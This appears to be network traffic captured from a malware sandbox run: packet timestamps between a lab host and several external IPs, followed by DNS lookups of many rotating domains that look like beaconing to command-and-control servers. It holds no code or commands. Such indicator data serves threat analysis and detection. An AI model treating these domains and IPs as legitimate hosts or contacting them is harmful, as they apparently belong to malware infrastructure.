                        Sep 9, 2024 04:52:17.823996067 CEST804975085.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:17.824071884 CEST4975080192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:17.829900980 CEST4975080192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:17.834712982 CEST804975085.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:18.546174049 CEST804975085.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:18.546567917 CEST804975085.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:18.546633959 CEST4975080192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:18.549006939 CEST4975080192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:18.553822041 CEST804975085.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:23.974786043 CEST4975180192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:23.979614973 CEST804975154.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:23.979696989 CEST4975180192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:23.990776062 CEST4975180192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:23.995651960 CEST804975154.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:24.881259918 CEST804975154.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:24.881282091 CEST804975154.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:24.881361008 CEST4975180192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:25.504765034 CEST4975180192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:26.522943974 CEST4975280192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:26.528764963 CEST804975254.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:26.529793978 CEST4975280192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:26.538639069 CEST4975280192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:26.544229031 CEST804975254.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:27.486562967 CEST804975254.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:27.486582994 CEST804975254.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:27.486646891 CEST4975280192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:28.051666975 CEST4975280192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:29.070429087 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:29.075320005 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.079826117 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:29.091778040 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:29.096688032 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096708059 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096797943 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096807957 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096899033 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096973896 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096982956 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.096991062 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:29.097002983 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:30.018930912 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:30.067218065 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:30.258212090 CEST804975354.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:30.258306026 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:30.601783991 CEST4975380192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:31.618526936 CEST4975480192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:31.623509884 CEST804975454.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:31.623631954 CEST4975480192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:31.632414103 CEST4975480192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:31.637268066 CEST804975454.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:32.576193094 CEST804975454.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:32.576261997 CEST804975454.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:32.580881119 CEST4975480192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:32.580881119 CEST4975480192.168.2.454.179.173.60
                        Sep 9, 2024 04:52:32.587687016 CEST804975454.179.173.60192.168.2.4
                        Sep 9, 2024 04:52:37.957951069 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:37.962783098 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:37.962850094 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:37.976773024 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:37.981564999 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628638029 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628658056 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628669024 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628680944 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628691912 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628703117 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628714085 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628727913 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628753901 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:38.628851891 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628864050 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.628875971 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:38.633610010 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.633620977 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.633631945 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.633639097 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:38.633642912 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.635078907 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:38.732472897 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.732542038 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.732671022 CEST8049755162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:38.734437943 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:39.491725922 CEST4975580192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:40.507652998 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:40.512533903 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:40.512605906 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:40.523871899 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:40.528773069 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191790104 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191812038 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191823006 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191840887 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191854000 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191865921 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191879034 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191890001 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.191891909 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.191936970 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.191936970 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.192078114 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.192154884 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.193968058 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.196687937 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.196707964 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.196799040 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.196813107 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.239101887 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:41.289599895 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.289619923 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.289732933 CEST8049756162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:41.289839983 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:42.036129951 CEST4975680192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.054761887 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.060606003 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.063828945 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.081810951 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.086858034 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086870909 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086888075 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086895943 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086904049 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086911917 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086927891 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086936951 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.086945057 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748126030 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748162985 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748173952 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748189926 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748193026 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.748203039 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748214006 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748223066 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.748231888 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748243093 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748248100 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.748255968 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748266935 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.748297930 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.748333931 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.753390074 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.753410101 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.753451109 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.753542900 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.753616095 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.753665924 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.846024990 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.846045017 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.846087933 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:43.846133947 CEST8049757162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:43.846179962 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:44.585760117 CEST4975780192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:45.602185965 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:45.607659101 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:45.607722998 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:45.616488934 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:45.621254921 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258069038 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258088112 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258097887 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258110046 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258121014 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258131027 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258142948 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258153915 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258157015 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:46.258169889 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258229971 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.258229971 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:46.258245945 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:46.258261919 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:46.262989044 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.263000965 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.263016939 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.263029099 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.263042927 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:46.263063908 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:46.357305050 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.357317924 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.357341051 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:46.357420921 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:46.357441902 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:46.359939098 CEST4975880192.168.2.4162.0.213.94
                        Sep 9, 2024 04:52:46.364696980 CEST8049758162.0.213.94192.168.2.4
                        Sep 9, 2024 04:52:51.391761065 CEST4975980192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:51.396652937 CEST80497593.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:51.400058031 CEST4975980192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:51.419115067 CEST4975980192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:51.423945904 CEST80497593.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:51.874933958 CEST80497593.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:51.874985933 CEST4975980192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:52.926672935 CEST4975980192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:52.933718920 CEST80497593.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:53.946300030 CEST4976080192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:53.952244043 CEST80497603.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:53.952317953 CEST4976080192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:53.966479063 CEST4976080192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:53.971263885 CEST80497603.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:54.426177979 CEST80497603.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:54.426237106 CEST4976080192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:55.473931074 CEST4976080192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:55.478785992 CEST80497603.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.492300034 CEST4976180192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:56.497390032 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.497458935 CEST4976180192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:56.513890028 CEST4976180192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:56.518774033 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.518785954 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.518794060 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.518811941 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.518820047 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.518918037 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.518927097 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.518965006 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.519009113 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.967226982 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:56.973655939 CEST4976180192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:58.020425081 CEST4976180192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:58.025527000 CEST80497613.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:59.039084911 CEST4976280192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:59.044071913 CEST80497623.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:59.044256926 CEST4976280192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:59.051961899 CEST4976280192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:59.058111906 CEST80497623.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:59.534921885 CEST80497623.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:59.535077095 CEST80497623.33.130.190192.168.2.4
                        Sep 9, 2024 04:52:59.535259008 CEST4976280192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:59.539747953 CEST4976280192.168.2.43.33.130.190
                        Sep 9, 2024 04:52:59.544533968 CEST80497623.33.130.190192.168.2.4
                        Sep 9, 2024 04:53:04.568816900 CEST4976380192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:04.573662043 CEST804976313.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:04.573733091 CEST4976380192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:04.584727049 CEST4976380192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:04.589483023 CEST804976313.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:05.038659096 CEST804976313.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:05.038780928 CEST4976380192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:06.098620892 CEST4976380192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:06.104231119 CEST804976313.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:07.123063087 CEST4976480192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:07.128388882 CEST804976413.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:07.128621101 CEST4976480192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:07.139619112 CEST4976480192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:07.149801970 CEST804976413.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:07.589508057 CEST804976413.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:07.589600086 CEST4976480192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:08.645448923 CEST4976480192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:08.650324106 CEST804976413.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:09.664644957 CEST4976580192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:09.669565916 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:09.669646978 CEST4976580192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:09.684768915 CEST4976580192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:09.690478086 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:09.690488100 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:09.690498114 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:09.690506935 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:09.690526009 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:09.691149950 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:09.691159010 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:09.691173077 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:09.691180944 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:10.141237020 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:10.141284943 CEST4976580192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:11.192322969 CEST4976580192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:11.197139025 CEST804976513.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:12.212047100 CEST4976680192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:12.217035055 CEST804976613.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:12.217099905 CEST4976680192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:12.226533890 CEST4976680192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:12.231312990 CEST804976613.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:12.697207928 CEST804976613.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:12.697262049 CEST804976613.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:12.697406054 CEST4976680192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:12.701790094 CEST4976680192.168.2.413.248.169.48
                        Sep 9, 2024 04:53:12.706607103 CEST804976613.248.169.48192.168.2.4
                        Sep 9, 2024 04:53:17.728219986 CEST4976780192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:17.733287096 CEST8049767185.134.245.113192.168.2.4
                        Sep 9, 2024 04:53:17.733347893 CEST4976780192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:17.744648933 CEST4976780192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:17.749577045 CEST8049767185.134.245.113192.168.2.4
                        Sep 9, 2024 04:53:18.391100883 CEST8049767185.134.245.113192.168.2.4
                        Sep 9, 2024 04:53:18.391185045 CEST8049767185.134.245.113192.168.2.4
                        Sep 9, 2024 04:53:18.391238928 CEST4976780192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:19.254877090 CEST4976780192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:20.274760962 CEST4976880192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:20.279690981 CEST8049768185.134.245.113192.168.2.4
                        Sep 9, 2024 04:53:20.279768944 CEST4976880192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:20.293540001 CEST4976880192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:20.298332930 CEST8049768185.134.245.113192.168.2.4
                        Sep 9, 2024 04:53:20.935451984 CEST8049768185.134.245.113192.168.2.4
                        Sep 9, 2024 04:53:20.935499907 CEST8049768185.134.245.113192.168.2.4
                        Sep 9, 2024 04:53:20.935573101 CEST4976880192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:21.801995039 CEST4976880192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:22.821990013 CEST4976980192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:22.826900005 CEST8049769185.134.245.113192.168.2.4
                        Sep 9, 2024 04:53:22.827060938 CEST4976980192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:22.840871096 CEST4976980192.168.2.4185.134.245.113
                        Sep 9, 2024 04:53:22.845748901 CEST8049769185.134.245.113192.168.2.4
                        Sep 9, 2024 04:53:22.845765114 CEST8049769185.134.245.113192.168.2.4
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Sep 9, 2024 04:51:32.562149048 CEST | 192.168.2.4 | 1.1.1.1 | 0x4e83 | Standard query (0) | www.nosr.net | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:51:48.508760929 CEST | 192.168.2.4 | 1.1.1.1 | 0x2e9f | Standard query (0) | www.monos.shop | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:51:56.649101019 CEST | 192.168.2.4 | 1.1.1.1 | 0xc057 | Standard query (0) | www.complexity.pub | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:09.992332935 CEST | 192.168.2.4 | 1.1.1.1 | 0x1222 | Standard query (0) | www.nevsehir-nakliyat.xyz | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:23.555442095 CEST | 192.168.2.4 | 1.1.1.1 | 0xc907 | Standard query (0) | www.masteriocp.online | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:37.587011099 CEST | 192.168.2.4 | 1.1.1.1 | 0xb631 | Standard query (0) | www.kryto.top | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:51.367829084 CEST | 192.168.2.4 | 1.1.1.1 | 0xc14e | Standard query (0) | www.angelenterprise.biz | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:04.555001020 CEST | 192.168.2.4 | 1.1.1.1 | 0x323f | Standard query (0) | www.dyme.tech | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:17.711639881 CEST | 192.168.2.4 | 1.1.1.1 | 0x6371 | Standard query (0) | www.lilibetmed.online | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:31.041980982 CEST | 192.168.2.4 | 1.1.1.1 | 0x3109 | Standard query (0) | www.mbwd.store | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:44.915317059 CEST | 192.168.2.4 | 1.1.1.1 | 0xc7a | Standard query (0) | www.terrearcenciel.online | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:52.994842052 CEST | 192.168.2.4 | 1.1.1.1 | 0x1f60 | Standard query (0) | www.fvti.cloud | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:54:07.040254116 CEST | 192.168.2.4 | 1.1.1.1 | 0x191f | Standard query (0) | www.theaji.shop | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:54:15.118418932 CEST | 192.168.2.4 | 1.1.1.1 | 0x86fd | Standard query (0) | www.sorriragora.online | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:54:28.821854115 CEST | 192.168.2.4 | 1.1.1.1 | 0x9c2a | Standard query (0) | www.jyourwd.store | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Sep 9, 2024 04:51:32.789654970 CEST | 1.1.1.1 | 192.168.2.4 | 0x4e83 | No error (0) | www.nosr.net | nosr.net | - | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 9, 2024 04:51:32.789654970 CEST | 1.1.1.1 | 192.168.2.4 | 0x4e83 | No error (0) | nosr.net | - | 82.221.128.183 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:51:48.593511105 CEST | 1.1.1.1 | 192.168.2.4 | 0x2e9f | Name error (3) | www.monos.shop | none | none | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:51:56.676213026 CEST | 1.1.1.1 | 192.168.2.4 | 0xc057 | No error (0) | www.complexity.pub | - | 217.160.0.127 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:10.098577023 CEST | 1.1.1.1 | 192.168.2.4 | 0x1222 | No error (0) | www.nevsehir-nakliyat.xyz | redirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 9, 2024 04:52:10.098577023 CEST | 1.1.1.1 | 192.168.2.4 | 0x1222 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 9, 2024 04:52:10.098577023 CEST | 1.1.1.1 | 192.168.2.4 | 0x1222 | No error (0) | natroredirect.natrocdn.com | - | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:23.972143888 CEST | 1.1.1.1 | 192.168.2.4 | 0xc907 | No error (0) | www.masteriocp.online | dns.ladipage.com | - | CNAME (Canonical name) | IN (0x0001) | false
